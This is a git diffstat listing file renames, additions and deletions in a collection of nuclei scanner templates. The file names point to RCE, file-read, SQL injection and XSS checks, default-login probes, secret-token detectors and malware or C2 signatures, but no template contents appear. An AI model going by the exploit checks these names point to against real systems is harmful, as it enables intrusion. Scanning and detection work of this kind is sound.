Seagate-media-rce.yaml} | 0 nuclei-templates/Other/Shellshock-RCE-1.yaml | 20 + .../Other/Shopify-custom-token.yaml | 16 + ...{shopify-token.yaml => Shopify-token.yaml} | 0 .../{slack-api-11864.yaml => Slack-api.yaml} | 0 .../Other/SpringBoot-Heapdump.yaml | 30 + .../Other/Springboot-Heapdump.yaml | 30 - .../Other/Springboot-Httptrace.yaml | 38 + ...ss-token.yaml => Square-access-token.yaml} | 0 ...h-secret.yaml => Square-oauth-secret.yaml} | 0 nuclei-templates/Other/SquirrelMail.yaml | 22 - .../Other/Symantec-Messaging-Gateway.yaml | 23 - nuclei-templates/Other/SymfonyRCE.yaml | 26 - ...\351\234\262\346\274\217\346\264\236.yaml" | 48 +- ...{tenda-leakage.yaml => Tenda-leakage.yaml} | 0 nuclei-templates/Other/ThinkPHP-501-RCE.yaml | 30 - .../Other/UnAuthenticated-Tensorboard.yaml | 27 + nuclei-templates/Other/WSO2-2019-0598.yaml | 34 - nuclei-templates/Other/WSO2MgmtConsole.yaml | 4 - .../Other/{X-Host .yaml => X-Host.yaml} | 0 .../{X-Remote-IP .yaml => X-Remote-IP.yaml} | 0 nuclei-templates/Other/aar-malware.yaml | 6 +- ...b-server-13.yaml => abyss-web-server.yaml} | 0 nuclei-templates/Other/ac-weak-login.yaml | 10 +- nuclei-templates/Other/academy-lms-xss.yaml | 15 +- .../Other/accent-microcomputers-lfi-14.yaml | 28 + .../Other/accent-microcomputers-lfi-16.yaml | 34 - .../Other/access-control-allow-origin.yaml | 4 +- .../{access-log.yaml => access-log-22.yaml} | 0 .../Other/accessibility-helper-xss-19.yaml | 30 + .../Other/accessibility-helper-xss.yaml | 31 - .../Other/accueil-wampserver.yaml | 17 +- .../Other/ace-admin-dashboard.yaml | 14 +- .../Other/acemanager-login-23.yaml | 69 +- nuclei-templates/Other/acenet-panel.yaml | 5 +- nuclei-templates/Other/achecker-panel.yaml | 9 +- .../{acme-xss-28.yaml => acme-xss-30.yaml} | 0 nuclei-templates/Other/acontent-detect.yaml | 52 +- .../Other/acquia-takeover-35.yaml | 21 + nuclei-templates/Other/acquia-takeover.yaml | 21 - ...hboard.yaml => acrolinx-dashboard-36.yaml} | 0 nuclei-templates/Other/acti-panel.yaml | 7 +- .../Other/active-admin-exposure-39.yaml | 4 +- .../Other/activemq-default-login-48.yaml | 33 - .../Other/activemq-default-login.yaml | 30 + .../activemq-openwire-transport-detect.yaml | 64 +- nuclei-templates/Other/activemq-panel-50.yaml | 19 + nuclei-templates/Other/activemq-panel-52.yaml | 19 - nuclei-templates/Other/activemq_apollo.yaml | 20 + .../Other/acunetix-360-installer.yaml | 5 +- nuclei-templates/Other/acunetix-login.yaml | 9 +- ...x-panel-59.yaml => acunetix-panel-56.yaml} | 0 nuclei-templates/Other/ad-inserter.yaml | 2 +- nuclei-templates/Other/ad-widget-lfi-124.yaml | 22 + nuclei-templates/Other/ad-widget-lfi-126.yaml | 33 - nuclei-templates/Other/adafruit-key.yaml | 5 +- .../Other/adb-backup-enabled-61.yaml | 15 + .../Other/adb-backup-enabled-62.yaml | 16 - nuclei-templates/Other/add-to-any.yaml | 2 +- .../Other/addeventlistener-detect-64.yaml | 19 - .../Other/addeventlistener-detect-66.yaml | 20 + .../Other/addeventlistener-message.yaml | 2 - .../Other/addonfinance-portal.yaml | 5 +- .../Other/adhoc-transfer-panel.yaml | 6 +- .../Other/adiscon-loganalyzer.yaml | 29 - nuclei-templates/Other/admin-file-search.yaml | 7 +- nuclei-templates/Other/admin-menu-editor.yaml | 2 +- .../Other/admin-word-count-column-lfi-81.yaml | 21 + .../Other/admin-word-count-column-lfi.yaml | 33 - nuclei-templates/Other/adminer-panel-75.yaml | 50 + .../Other/adminer-panel-detect.yaml | 10 +- .../Other/adminer-panel-fuzz-73.yaml | 46 - .../Other/adminer-panel-fuzz.yaml | 39 + nuclei-templates/Other/adminer-panel.yaml | 45 - nuclei-templates/Other/adminimize.yaml | 6 +- nuclei-templates/Other/adminset-panel-78.yaml | 10 +- .../Other/admiralcloud-detect.yaml | 2 +- .../Other/admzip-path-overwrite.yaml | 14 +- nuclei-templates/Other/adobe-client.yaml | 5 +- ...3.yaml => adobe-coldfusion-detect-82.yaml} | 0 .../Other/adobe-coldfusion-detect-84.yaml | 114 +- .../adobe-coldfusion-error-detect-87.yaml | 55 +- ...aml => adobe-coldfusion-error-detect.yaml} | 0 .../Other/adobe-component-login-89.yaml | 31 + .../Other/adobe-component-login-90.yaml | 32 - .../Other/adobe-component-login.yaml | 8 +- .../Other/adobe-connect-central-login-93.yaml | 23 - .../Other/adobe-connect-central-login-97.yaml | 33 + ...> adobe-connect-username-exposure-98.yaml} | 0 ...on-102.yaml => adobe-connect-version.yaml} | 0 .../adobe-experience-manager-login-105.yaml | 30 + .../adobe-experience-manager-login-109.yaml | 23 - .../Other/adobe-media-server-112.yaml | 23 + .../Other/adobe-media-server.yaml | 31 - nuclei-templates/Other/adobe-secret.yaml | 5 +- .../advanced-access-manager-lfi-118.yaml | 31 + .../Other/advanced-access-manager-lfi.yaml | 35 - .../advanced-access-manager-plugin-lfi.yaml | 2 +- .../Other/advanced-custom-fields.yaml | 4 +- nuclei-templates/Other/adzok-malware.yaml | 5 +- nuclei-templates/Other/aem-acs-common.yaml | 5 +- .../Other/aem-bg-servlet-127.yaml | 24 - .../Other/aem-bg-servlet-129.yaml | 23 + nuclei-templates/Other/aem-bulkeditor.yaml | 5 +- nuclei-templates/Other/aem-cms.yaml | 6 +- nuclei-templates/Other/aem-crx-browser.yaml | 5 +- ...ypass-134.yaml => aem-crx-bypass-132.yaml} | 0 nuclei-templates/Other/aem-crx-namespace.yaml | 7 +- .../Other/aem-crx-package-manager.yaml | 10 +- nuclei-templates/Other/aem-crx-search.yaml | 6 +- nuclei-templates/Other/aem-custom-script.yaml | 8 +- .../Other/aem-debugging-libraries.yaml | 5 +- ....yaml => aem-default-get-servlet-139.yaml} | 0 .../Other/aem-default-login-140.yaml | 46 - .../Other/aem-default-login-141.yaml | 56 + nuclei-templates/Other/aem-detaction.yaml | 11 +- nuclei-templates/Other/aem-detect.yaml | 6 +- ...-detection.yaml => aem-detection-145.yaml} | 0 nuclei-templates/Other/aem-disk-usage.yaml | 6 +- .../Other/aem-dump-contentnode.yaml | 8 +- .../Other/aem-explorer-nodetypes.yaml | 5 +- .../Other/aem-external-link-checker.yaml | 6 +- nuclei-templates/Other/aem-felix-console.yaml | 9 +- ...vlet-147.yaml => aem-gql-servlet-150.yaml} | 0 ...onsole-153.yaml => aem-groovyconsole.yaml} | 0 .../Other/aem-hash-querybuilder-160.yaml | 30 - .../Other/aem-hash-querybuilder.yaml | 26 + .../Other/aem-jcr-querybuilder-162.yaml | 28 + .../Other/aem-jcr-querybuilder-164.yaml | 31 - nuclei-templates/Other/aem-login-status.yaml | 15 +- ...ml => aem-merge-metadata-servlet-172.yaml} | 0 nuclei-templates/Other/aem-misc-admin.yaml | 27 +- .../Other/aem-offloading-browser.yaml | 5 +- nuclei-templates/Other/aem-osgi-bundles.yaml | 5 +- .../aem-querybuilder-feed-servlet-175.yaml | 23 + .../aem-querybuilder-feed-servlet-177.yaml | 23 - ...m-querybuilder-internal-path-read-180.yaml | 25 - .../aem-querybuilder-internal-path-read.yaml | 24 + .../aem-querybuilder-json-servlet-184.yaml | 30 + .../Other/aem-querybuilder-json-servlet.yaml | 41 - nuclei-templates/Other/aem-secrets.yaml | 44 - .../Other/aem-security-users.yaml | 5 +- .../Other/aem-setpreferences-xss-189.yaml | 26 + .../Other/aem-setpreferences-xss.yaml | 30 - nuclei-templates/Other/aem-sling-login.yaml | 10 +- .../Other/aem-sling-userinfo.yaml | 6 +- .../Other/aem-userinfo-servlet-190.yaml | 25 + .../Other/aem-userinfo-servlet-192.yaml | 31 - .../aem-wcm-suggestions-servlet-194.yaml | 26 - .../Other/aem-wcm-suggestions-servlet.yaml | 27 + .../Other/aem-xss-childlist-selector-197.yaml | 35 - .../Other/aem-xss-childlist-selector.yaml | 30 + nuclei-templates/Other/aerocms-detect.yaml | 7 +- nuclei-templates/Other/aerocms-sqli.yaml | 7 +- .../Other/aerohive-netconfig-ui-201.yaml | 31 - .../Other/aerohive-netconfig-ui.yaml | 42 + .../Other/afterlogic-webmail-login.yaml | 8 +- .../Other/aftership-takeover-203.yaml | 15 - .../Other/aftership-takeover-206.yaml | 16 + .../Other/age-gate-open-redirect-207.yaml | 9 +- nuclei-templates/Other/age-gate-xss.yaml | 9 +- .../Other/age-identity-secret-key.yaml | 6 +- .../Other/age-recipient-public-key.yaml | 6 +- ...keover.yaml => agilecrm-takeover-209.yaml} | 0 nuclei-templates/Other/aha-takeover-214.yaml | 15 - nuclei-templates/Other/aha-takeover-216.yaml | 16 + .../{AIC-leakage.yaml => aic-leakage.yaml} | 0 .../Other/aims-password-mgmt-client-219.yaml | 17 - .../Other/aims-password-mgmt-client.yaml | 27 + .../Other/aims-password-portal-222.yaml | 22 + .../Other/aims-password-portal-224.yaml | 22 - .../Other/aircube-dashboard-panel.yaml | 9 +- nuclei-templates/Other/aircube-login.yaml | 9 +- .../Other/airflow-api-exposure.yaml | 1 + .../airflow-configuration-exposure-230.yaml | 18 - .../Other/airflow-configuration-exposure.yaml | 16 + nuclei-templates/Other/airflow-debug-233.yaml | 26 - nuclei-templates/Other/airflow-debug.yaml | 29 + .../Other/airflow-default-credentials.yaml | 7 - .../Other/airflow-default-login-236.yaml | 57 + .../Other/airflow-default-login.yaml | 64 - ...etect-240.yaml => airflow-detect-239.yaml} | 0 nuclei-templates/Other/airflow-panel-242.yaml | 19 + nuclei-templates/Other/airflow-panel-245.yaml | 28 - ...horized.yaml => airflow-unauthorized.yaml} | 0 nuclei-templates/Other/airnotifier-panel.yaml | 9 +- nuclei-templates/Other/airtable-key.yaml | 6 +- .../Other/ait-csv-import-export-rce.yaml | 21 +- nuclei-templates/Other/aj-report.yaml | 20 + .../Other/akamai-arl-xss-248.yaml | 31 + .../Other/akamai-arl-xss-249.yaml | 31 - .../Other/akamai-cache-detect.yaml | 9 +- ...oudtest.yaml => akamai-cloudtest-254.yaml} | 0 nuclei-templates/Other/akamai-detect.yaml | 9 +- .../Other/akamai-s3-cache-poisoning.yaml | 23 +- nuclei-templates/Other/akismet.yaml | 4 +- nuclei-templates/Other/alfa-malware.yaml | 4 +- .../Other/alfacgiapi-wordpress-256.yaml | 33 - .../Other/alfacgiapi-wordpress.yaml | 32 + .../Other/alfresco-detect-258.yaml | 33 + .../Other/alfresco-detect-259.yaml | 43 - nuclei-templates/Other/algolia-key.yaml | 5 +- ...ad.yaml => alibaba-anyproxy-fileread.yaml} | 0 .../Other/alibaba-anyproxy-lfi.yaml | 4 +- ...> alibaba-canal-default-password-262.yaml} | 0 nuclei-templates/Other/alibaba-key-id.yaml | 3 +- .../Other/alibaba-mongoshake-unauth.yaml | 2 +- nuclei-templates/Other/alibaba-secret-id.yaml | 3 +- nuclei-templates/Other/alienspy-malware.yaml | 6 +- .../Other/alienvault-usm-274.yaml | 10 +- nuclei-templates/Other/alina-malware.yaml | 6 +- .../Other/all-404-redirect-to-homepage.yaml | 8 +- .../Other/all-in-one-seo-pack.yaml | 2 +- .../Other/all-in-one-wp-migration.yaml | 4 +- .../all-in-one-wp-security-and-firewall.yaml | 2 +- .../Other/allied-telesis-exposure.yaml | 13 +- nuclei-templates/Other/alpha-malware.yaml | 4 +- .../Other/alphaweb-default-login-275.yaml | 38 + .../Other/alphaweb-default-login-277.yaml | 35 - .../Other/alumni-management-sqli.yaml | 13 +- nuclei-templates/Other/amazon-account-id.yaml | 5 +- ...fig.yaml => amazon-docker-config-280.yaml} | 0 nuclei-templates/Other/amazon-ec2-detect.yaml | 5 +- nuclei-templates/Other/amazon-ec2-ssrf.yaml | 6 +- .../Other/amazon-mws-auth-token-11845.yaml | 17 + .../Other/amazon-mws-auth-token-value.yaml | 16 - ...en-283.yaml => amazon-mws-auth-token.yaml} | 0 .../Other/amazon-session-token.yaml | 5 +- .../Other/ambari-default-login-287.yaml | 26 + .../Other/ambari-default-login-290.yaml | 35 - ...sure-294.yaml => ambari-exposure-291.yaml} | 0 nuclei-templates/Other/amcrest-login-297.yaml | 28 - nuclei-templates/Other/amcrest-login.yaml | 34 + .../Other/amministrazione-aperta-lfi-303.yaml | 15 +- .../Other/amp-application-panel.yaml | 15 +- nuclei-templates/Other/amp.yaml | 2 +- nuclei-templates/Other/ampache-debug.yaml | 6 +- .../Other/ampache-music-installer.yaml | 5 +- nuclei-templates/Other/ampache-panel.yaml | 13 +- .../Other/ampache-update-exposure.yaml | 5 +- .../Other/ampguard-wifi-setup.yaml | 7 +- ...el-306.yaml => ampps-admin-panel-305.yaml} | 0 ...listing.yaml => ampps-dirlisting-308.yaml} | 0 nuclei-templates/Other/ampps-panel-309.yaml | 40 - nuclei-templates/Other/ampps-panel-310.yaml | 35 + .../Other/analytify-plugin-xss.yaml | 13 +- .../Other/anaqua-login-panel.yaml | 6 +- .../android-debug-database-exposed-312.yaml | 23 - .../Other/android-debug-database-exposed.yaml | 24 + nuclei-templates/Other/andromeda-malware.yaml | 5 +- ...ngular-client-side-template-injection.yaml | 10 +- nuclei-templates/Other/angular-detect.yaml | 6 +- nuclei-templates/Other/angular-json.yaml | 6 +- ...-takeover.yaml => anima-takeover-317.yaml} | 0 ...leDownload.yaml => anni-filedownload.yaml} | 0 ...322.yaml => announcekit-takeover-324.yaml} | 0 .../Other/ansible-awx-detect.yaml | 5 +- .../Other/ansible-config-disclosure-326.yaml | 18 - .../Other/ansible-config-disclosure.yaml | 16 + .../Other/ansible-semaphore-panel-327.yaml | 34 - .../Other/ansible-semaphore-panel.yaml | 26 + .../Other/ansible-tower-exposure-331.yaml | 40 - .../Other/ansible-tower-exposure-332.yaml | 19 + nuclei-templates/Other/antispam-bee.yaml | 2 +- .../Other/antsword-backdoor-335.yaml | 35 - nuclei-templates/Other/antsword-backdoor.yaml | 24 + ...eakPass.yaml => aolynkbr304-weakpass.yaml} | 0 .../Other/ap0calypse-malware.yaml | 6 +- .../Other/apache-activemq-detect.yaml | 56 +- ...kPass.yaml => apache-ambari-weakpass.yaml} | 0 .../Other/apache-apisix-panel-336.yaml | 30 + .../Other/apache-apisix-panel-337.yaml | 25 - .../Other/apache-axis-detect-340.yaml | 64 +- nuclei-templates/Other/apache-detect-348.yaml | 30 + nuclei-templates/Other/apache-detect.yaml | 30 - .../Other/apache-drill-exposure.yaml | 5 +- .../Other/apache-druid-kafka-connect-rce.yaml | 99 + .../Other/apache-druid-log4j.yaml | 6 +- .../Other/apache-druid-unauth.yaml | 6 +- ...tect-351.yaml => apache-dubbo-detect.yaml} | 0 .../Other/apache-dubbo-unauth.yaml | 15 +- .../Other/apache-filename-enum-354.yaml | 30 + .../Other/apache-filename-enum.yaml | 30 - .../Other/apache-flink-unauth-rce-356.yaml | 44 + .../Other/apache-flink-unauth-rce-358.yaml | 39 - ...acamole-361.yaml => apache-guacamole.yaml} | 0 ...ml => apache-hertzbeat-default-login.yaml} | 0 ...tpd-rce-362.yaml => apache-httpd-rce.yaml} | 0 .../Other/apache-jmeter-dashboard.yaml | 12 +- .../Other/apache-karaf-panel.yaml | 5 +- nuclei-templates/Other/apache-licenserc.yaml | 5 +- .../Other/apache-mesos-panel.yaml | 15 +- .../Other/apache-nifi-unauth.yaml | 43 + .../Other/apache-rocketmq-broker-unauth.yaml | 33 +- .../Other/apache-solr-file-read-368.yaml | 44 + ... => apache-solr-log4j-cve-2021-44228.yaml} | 0 .../Other/apache-solr-log4j-rce.yaml | 9 +- nuclei-templates/Other/apache-solr-rce.yaml | 9 +- .../Other/apache-streampipes-detect.yaml | 78 +- .../Other/apache-struts-showcase.yaml | 8 +- ...yaml => apache-tomcat-cve-2022-34305.yaml} | 0 .../apache-tomcat-snoop-ip-disclosure.yaml | 4 - nuclei-templates/Other/apachesolrlfissrf.yaml | 47 + nuclei-templates/Other/apc-info-379.yaml | 22 - nuclei-templates/Other/apc-ups-login-381.yaml | 25 + nuclei-templates/Other/apc-ups-login-382.yaml | 24 - nuclei-templates/Other/apc_info.yaml | 19 + nuclei-templates/Other/apdisk-disclosure.yaml | 4 +- nuclei-templates/Other/apeosport-v_c3375.yaml | 21 + ...pereo-Cas-rce.yaml => apereo-cas-rce.yaml} | 0 nuclei-templates/Other/api-1forge.yaml | 10 +- .../api-abstract-company-enrichment.yaml | 7 +- .../Other/api-abstract-email-validation.yaml | 7 +- .../Other/api-abstract-exchange-rates.yaml | 7 +- .../Other/api-abstract-iban-validation.yaml | 7 +- .../Other/api-abstract-image-processing.yaml | 7 +- .../Other/api-abstract-ip-geolocation.yaml | 7 +- .../Other/api-abstract-phone-validation.yaml | 7 +- .../Other/api-abstract-public-holidays.yaml | 7 +- .../Other/api-abstract-timezone.yaml | 7 +- .../Other/api-abstract-user-avatars.yaml | 7 +- .../api-abstract-vat-validation-rates.yaml | 7 +- .../Other/api-abstract-website-scraping.yaml | 7 +- .../api-abstract-website-screenshot.yaml | 9 +- ...tractapi.yaml => api-abstractapi-383.yaml} | 0 ...fruit-io-387.yaml => api-adafruit-io.yaml} | 0 nuclei-templates/Other/api-airtable.yaml | 7 +- .../Other/api-alienvault-390.yaml | 26 - nuclei-templates/Other/api-alienvault.yaml | 26 + nuclei-templates/Other/api-amdoren.yaml | 10 +- nuclei-templates/Other/api-api2convert.yaml | 7 +- nuclei-templates/Other/api-apiflash.yaml | 7 +- nuclei-templates/Other/api-asana-393.yaml | 18 + nuclei-templates/Other/api-asana.yaml | 25 - nuclei-templates/Other/api-binaryedge.yaml | 11 +- nuclei-templates/Other/api-bingmaps-395.yaml | 19 - nuclei-templates/Other/api-bingmaps.yaml | 16 + nuclei-templates/Other/api-blitapp.yaml | 7 +- nuclei-templates/Other/api-block-400.yaml | 25 + nuclei-templates/Other/api-block.yaml | 26 - .../Other/api-blockchain-398.yaml | 8 +- nuclei-templates/Other/api-browshot.yaml | 7 +- nuclei-templates/Other/api-c99.yaml | 9 +- nuclei-templates/Other/api-calendly-404.yaml | 17 + nuclei-templates/Other/api-calendly.yaml | 25 - nuclei-templates/Other/api-chaos.yaml | 11 +- nuclei-templates/Other/api-clearbit-407.yaml | 27 - nuclei-templates/Other/api-clearbit.yaml | 28 + nuclei-templates/Other/api-clickup.yaml | 7 +- nuclei-templates/Other/api-clockify.yaml | 7 +- nuclei-templates/Other/api-cloudconvert.yaml | 7 +- nuclei-templates/Other/api-cloudflare.yaml | 7 +- nuclei-templates/Other/api-codestats.yaml | 7 +- nuclei-templates/Other/api-coinmarketcap.yaml | 10 +- nuclei-templates/Other/api-coinranking.yaml | 10 +- ...itt-411.yaml => api-cooperhewitt-409.yaml} | 0 nuclei-templates/Other/api-craftmypdf.yaml | 7 +- .../Other/api-currencyfreaks.yaml | 7 +- nuclei-templates/Other/api-currencylayer.yaml | 7 +- nuclei-templates/Other/api-currencyscoop.yaml | 7 +- nuclei-templates/Other/api-debounce-414.yaml | 25 - nuclei-templates/Other/api-debounce.yaml | 25 + nuclei-templates/Other/api-deviantart.yaml | 21 + nuclei-templates/Other/api-digitalocean.yaml | 7 +- nuclei-templates/Other/api-dribbble-416.yaml | 21 + nuclei-templates/Other/api-dribbble-417.yaml | 21 - .../{dropbox.yaml => api-dropbox-418.yaml} | 0 nuclei-templates/Other/api-europeana-419.yaml | 25 + nuclei-templates/Other/api-europeana.yaml | 21 - .../Other/api-exchangerateapi.yaml | 7 +- ...pi-facebook-422.yaml => api-facebook.yaml} | 0 nuclei-templates/Other/api-fastly.yaml | 14 +- nuclei-templates/Other/api-festivo-425.yaml | 25 - nuclei-templates/Other/api-festivo.yaml | 26 + nuclei-templates/Other/api-flickr.yaml | 7 +- nuclei-templates/Other/api-flowdash.yaml | 7 +- ...tawesome.yaml => api-fontawesome-426.yaml} | 0 ...oud-427.yaml => api-fortitoken-cloud.yaml} | 0 nuclei-templates/Other/api-front.yaml | 8 +- nuclei-templates/Other/api-giphy.yaml | 7 +- nuclei-templates/Other/api-gitlab-431.yaml | 12 +- .../Other/api-google-drive-432.yaml | 28 + nuclei-templates/Other/api-google-drive.yaml | 23 - nuclei-templates/Other/api-gorest.yaml | 7 +- .../Other/api-harvardart-433.yaml | 25 + .../Other/api-harvardart-434.yaml | 25 - .../{api-heroku-435.yaml => api-heroku.yaml} | 0 .../Other/api-hirak-rates-436.yaml | 32 + nuclei-templates/Other/api-hirak-rates.yaml | 27 - nuclei-templates/Other/api-host-io.yaml | 7 +- nuclei-templates/Other/api-html2pdf.yaml | 7 +- nuclei-templates/Other/api-hubspot-437.yaml | 21 - nuclei-templates/Other/api-hunter.yaml | 7 +- ...confinder.yaml => api-iconfinder-438.yaml} | 0 nuclei-templates/Other/api-improvmx-440.yaml | 29 + nuclei-templates/Other/api-improvmx.yaml | 30 - nuclei-templates/Other/api-instagram.yaml | 13 +- nuclei-templates/Other/api-intelx.yaml | 13 +- ...pi-intercom.yaml => api-intercom-443.yaml} | 0 nuclei-templates/Other/api-ip2whois.yaml | 7 +- nuclei-templates/Other/api-ipdata.yaml | 20 +- nuclei-templates/Other/api-ipfind.yaml | 7 +- nuclei-templates/Other/api-ipinfo.yaml | 9 +- nuclei-templates/Other/api-ipstack-444.yaml | 17 + nuclei-templates/Other/api-jsonbin.yaml | 7 +- .../{jumpcloud.yaml => api-jumpcloud.yaml} | 0 .../Other/api-launchdarkly-449.yaml | 7 +- .../{api-leanix.yaml => api-leanix-450.yaml} | 0 nuclei-templates/Other/api-lob.yaml | 9 +- ...pi-lokalise.yaml => api-lokalise-452.yaml} | 0 .../Other/api-mac-address-lookup.yaml | 7 +- nuclei-templates/Other/api-mailchimp.yaml | 20 - ...pi-malshare-457.yaml => api-malshare.yaml} | 0 .../Other/api-malwarebazaar-458.yaml | 40 + nuclei-templates/Other/api-malwarebazaar.yaml | 40 - .../{mapbox.yaml => api-mapbox-465.yaml} | 0 nuclei-templates/Other/api-mojoauth-466.yaml | 26 + nuclei-templates/Other/api-mojoauth.yaml | 28 - nuclei-templates/Other/api-monday.yaml | 7 +- nuclei-templates/Other/api-moonpay.yaml | 7 +- nuclei-templates/Other/api-mywot-467.yaml | 27 - nuclei-templates/Other/api-mywot.yaml | 27 + nuclei-templates/Other/api-networksdb.yaml | 2 + nuclei-templates/Other/api-newrelic.yaml | 9 +- nuclei-templates/Other/api-notolytix.yaml | 2 + nuclei-templates/Other/api-npm-471.yaml | 19 + nuclei-templates/Other/api-npm.yaml | 23 - nuclei-templates/Other/api-nytimes.yaml | 7 +- .../Other/api-open-page-rank.yaml | 7 +- nuclei-templates/Other/api-opengraphr.yaml | 7 +- .../Other/api-openweather-473.yaml | 3 - nuclei-templates/Other/api-opsgenie.yaml | 11 +- nuclei-templates/Other/api-pagecdn.yaml | 7 +- nuclei-templates/Other/api-pastebin-477.yaml | 27 - nuclei-templates/Other/api-pastebin.yaml | 28 + .../{api-paypal.yaml => api-paypal-478.yaml} | 0 nuclei-templates/Other/api-pdflayer.yaml | 7 +- nuclei-templates/Other/api-pendo.yaml | 14 +- nuclei-templates/Other/api-petfinder-480.yaml | 30 - nuclei-templates/Other/api-petfinder.yaml | 31 + ...acker.yaml => api-pivotaltracker-482.yaml} | 0 .../{postmark.yaml => api-postmark-483.yaml} | 0 nuclei-templates/Other/api-prexview.yaml | 7 +- nuclei-templates/Other/api-proxycrawl.yaml | 7 +- nuclei-templates/Other/api-proxykingdom.yaml | 7 +- .../Other/api-rijksmuseum-486.yaml | 25 + nuclei-templates/Other/api-rijksmuseum.yaml | 25 - nuclei-templates/Other/api-savepage.yaml | 7 +- nuclei-templates/Other/api-scanii-487.yaml | 26 - nuclei-templates/Other/api-scanii-488.yaml | 26 + nuclei-templates/Other/api-scraperapi.yaml | 7 +- nuclei-templates/Other/api-scraperbox.yaml | 7 +- nuclei-templates/Other/api-scrapestack.yaml | 7 +- nuclei-templates/Other/api-scrapingant.yaml | 7 +- nuclei-templates/Other/api-scrapingdog.yaml | 7 +- nuclei-templates/Other/api-screenshotapi.yaml | 7 +- .../Other/api-securitytrails.yaml | 11 +- nuclei-templates/Other/api-segment.yaml | 7 +- nuclei-templates/Other/api-sendgrid-489.yaml | 3 - nuclei-templates/Other/api-sentry.yaml | 9 +- nuclei-templates/Other/api-serpstack.yaml | 7 +- nuclei-templates/Other/api-shodan.yaml | 9 +- nuclei-templates/Other/api-spotify-495.yaml | 20 - nuclei-templates/Other/api-spotify.yaml | 25 + nuclei-templates/Other/api-square-496.yaml | 25 - nuclei-templates/Other/api-square.yaml | 21 + .../{api-strava.yaml => api-strava-498.yaml} | 0 nuclei-templates/Other/api-stripe.yaml | 13 +- nuclei-templates/Other/api-stytch-500.yaml | 30 - nuclei-templates/Other/api-stytch.yaml | 31 + .../Other/api-supportivekoala.yaml | 7 +- nuclei-templates/Other/api-tatum.yaml | 34 +- nuclei-templates/Other/api-thecatapi-502.yaml | 3 +- nuclei-templates/Other/api-ticketmaster.yaml | 9 +- .../{api-tink-504.yaml => api-tink.yaml} | 0 nuclei-templates/Other/api-tinypng-505.yaml | 3 - nuclei-templates/Other/api-todoist.yaml | 7 +- ...{api-twitter-507.yaml => api-twitter.yaml} | 0 ...{api-urlscan-508.yaml => api-urlscan.yaml} | 0 nuclei-templates/Other/api-userstack.yaml | 9 +- .../{api-vercel.yaml => api-vercel-510.yaml} | 0 .../Other/api-virustotal-512.yaml | 30 + nuclei-templates/Other/api-virustotal.yaml | 30 - ...lstudio.yaml => api-visualstudio-513.yaml} | 0 .../{wakatime.yaml => api-wakatime-514.yaml} | 0 nuclei-templates/Other/api-wordnik.yaml | 7 +- ...{api-youtube.yaml => api-youtube-519.yaml} | 0 nuclei-templates/Other/api-zenrows.yaml | 7 +- nuclei-templates/Other/api-zerbounce.yaml | 9 +- nuclei-templates/Other/api-zoomeye.yaml | 11 +- nuclei-templates/Other/apigee-panel.yaml | 4 +- ...n-panel-464.yaml => apiman-panel-462.yaml} | 0 .../Other/apisix-default-login-491.yaml | 42 - .../Other/apisix-default-login.yaml | 37 + .../Other/apollo-default-login-521.yaml | 55 + .../Other/apollo-default-login.yaml | 57 - .../Other/apollo-server-detect-522.yaml | 37 + .../Other/apollo-server-detect.yaml | 36 - nuclei-templates/Other/appcms-detect.yaml | 7 +- ...ml => apple-app-site-association-524.yaml} | 0 nuclei-templates/Other/apple-httpserver.yaml | 7 +- ...el_dos.yaml => application_level_dos.yaml} | 0 .../Other/application_security_gateway.yaml | 20 + .../Other/appsettings-file-disclosure.yaml | 6 +- .../Other/appsmith-web-login.yaml | 12 +- nuclei-templates/Other/appspace-panel.yaml | 8 +- nuclei-templates/Other/appsuite-panel.yaml | 10 +- .../Other/appveyor-configuration-file.yaml | 13 +- nuclei-templates/Other/appwrite-panel.yaml | 8 +- nuclei-templates/Other/aptus-detect.yaml | 4 - nuclei-templates/Other/aptus-panel.yaml | 7 +- .../Other/aqua-enterprise-detect.yaml | 5 +- .../Other/aqua-enterprise-panel.yaml | 11 +- .../Other/arangodb-web-Interface.yaml | 8 +- .../Other/arbitrary-file-read.yaml | 1 - ...s-panel-530.yaml => arcgis-panel-531.yaml} | 0 .../Other/arcgis-rest-api-532.yaml | 29 + .../Other/arcgis-rest-api-533.yaml | 32 - nuclei-templates/Other/arcgis-services.yaml | 10 +- nuclei-templates/Other/arcgis-tokens.yaml | 4 +- .../Other/archibus-webcentral-panel.yaml | 13 +- nuclei-templates/Other/arcom-malware.yaml | 5 +- nuclei-templates/Other/arcserve-panel.yaml | 10 +- nuclei-templates/Other/ares-rat-c2.yaml | 4 +- nuclei-templates/Other/argo_cd.yaml | 20 + nuclei-templates/Other/argocd-login-534.yaml | 19 + nuclei-templates/Other/argocd-login.yaml | 32 - nuclei-templates/Other/arkei-malware.yaml | 6 +- .../Other/arl-default-login-537.yaml | 9 +- .../Other/arris-modem-detect.yaml | 14 +- ...-544.yaml => artica-web-proxy-detect.yaml} | 0 .../Other/artifactory-anonymous-deploy.yaml | 30 - .../Other/artifactory_deploy.yaml | 24 + .../Other/aruba-instant-default-login.yaml | 27 +- nuclei-templates/Other/aruba_instant.yaml | 21 + nuclei-templates/Other/asana-clientid.yaml | 3 +- .../Other/asana-clientsecret.yaml | 3 +- .../Other/asanhamayesh-cms-lfi.yaml | 2 +- ...lfi-553.yaml => asanhamayesh-lfi-552.yaml} | 0 .../Other/aspcms-backend-panel.yaml | 7 +- .../Other/aspect-control-panel.yaml | 6 +- .../Other/aspnet-version-detect.yaml | 2 +- .../Other/aspnetmvc-version-disclosure.yaml | 2 +- .../Other/aspose-file-download-561.yaml | 24 + .../Other/aspose-file-download.yaml | 27 - .../Other/aspose-ie-file-download-562.yaml | 25 - .../Other/aspose-ie-file-download-565.yaml | 29 + ...spose-importer-exporter-file-download.yaml | 2 +- .../Other/aspose-pdf-file-download-568.yaml | 25 + .../Other/aspose-pdf-file-download.yaml | 35 - .../aspose-words-exporter-file-download.yaml | 2 +- .../Other/aspose-words-file-download-571.yaml | 25 + .../Other/aspose-words-file-download-572.yaml | 35 - .../Other/aspx-debug-mode-577.yaml | 33 + .../Other/aspx-debug-mode-578.yaml | 32 - nuclei-templates/Other/astra-sites.yaml | 2 +- nuclei-templates/Other/astra-widgets.yaml | 2 +- .../Other/asus-aicloud-panel.yaml | 5 +- nuclei-templates/Other/asus-router-panel.yaml | 9 +- ...OR-ADM-sqli.yaml => asustor-adm-sqli.yaml} | 0 nuclei-templates/Other/asyncrat-c2.yaml | 5 +- .../atechmedia-codebase-login-check.yaml | 4 +- ...R-fileRead.yaml => athd-dvr-fileread.yaml} | 0 nuclei-templates/Other/atlantis-detect.yaml | 14 +- .../Other/atlassian-api-token.yaml 